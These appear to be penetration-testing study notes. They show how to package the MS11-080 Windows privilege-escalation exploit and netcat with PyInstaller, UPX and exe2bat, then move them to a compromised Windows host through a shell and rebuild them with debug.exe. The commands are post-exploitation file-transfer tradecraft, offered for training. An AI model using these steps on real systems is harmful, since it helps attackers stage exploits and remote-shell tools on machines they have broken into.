We can make python scripts into exe files: Downloaded ms11-080 from exploitdb:

#python pyinstaller.py --onefile ms11-080.py # upx -9 ms11-080.exe # ls -l ms11-080.exe //after packing check the size to make sure it is under 64k # wine exe2bat.exe ms11-080.exe ms11-080.txt //send it over the shell and the magic bytes will auto decode to echo a new file to ms11-080.exe Lets pack and move nc! # locate nc.exe | grep binaries # cp /usr/share/windows-binaries/nc.exe . # ls -l nc.exe # upx -9 nc.exe # ls -l nc.exe # locate exe2bat # cp /usr/share/windows-binaries/exe2bat.exe . # wine exe2bat.exe nc.exe nc.txt # head nc.txt //We can now transfer the nc.txt to the win machine and then launch the file back into an exe with debug.exe The pdf did not show this step but should be simple and easy to google. Explanation: Another common file transfer method employed against 32 bit Windows operating systems is the debug.exe utility. The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. The concept behind the use of debug.exe for file transfers is similar to the use of scripting languages. We use non-interactive echo commands, to write out the binary file in its hex value equivalents, and then use debug.exe to assemble the written text file into a binary file. There is a 64k byte size limit to the files that can be created bydebug.exe. We can further the size of exploits we push by using UPX packer.